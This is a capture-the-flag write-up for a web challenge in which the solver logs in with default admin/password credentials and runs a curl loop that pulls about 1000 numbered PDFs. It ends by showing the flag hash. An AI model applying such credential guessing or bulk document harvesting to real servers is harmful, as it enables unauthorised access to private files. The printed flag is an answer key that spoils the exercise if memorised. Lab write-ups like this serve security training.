Secret Files (bronze, 50p)

You have found a webserver with login prompt at https://10.XX.32.95:1002. Try to find the flag.
Can you find login credentials and retrieve the flag that is hidden in one of the PDF files?


The webpage asks for credentials.

screenshot of website

Providing a simple admin/password credential pair allows to log in. Website provides a list of ~1000 documents (screenshot contains only two) to download.

screenshot of documents list

Look at HTML source to write a script for document download.

<center><h3>Welcome to top secret document storage</h3></center><br><br>
Do not share this confidential file without a permission: <a href="uploads/secret_document1.pdf"><img src="pdf.png" height=20>download file</a><br><hr><br>
Do not share this confidential file without a permission: <a href="uploads/secret_document2.pdf"><img src="pdf.png" height=20>download file</a><br><hr><br>

Download all documents and convert to text with pdftotext. Flag is revealed in secret_document222.pdf.

$ for i in $(seq 1 1000); do echo -n "$i: "; curl -sk https://10.XX.32.95:1002/uploads/secret_document$i.pdf -o - | pdftotext  - - | xargs; done
1: 404 Flag not found.
2: 404 Flag not found.
3: 404 Flag not found.
220: 404 Flag not found.
221: 404 Flag not found.
222: 5a3120aef7d098ea27a3c5de177b2602
223: 404 Flag not found.
224: 404 Flag not found.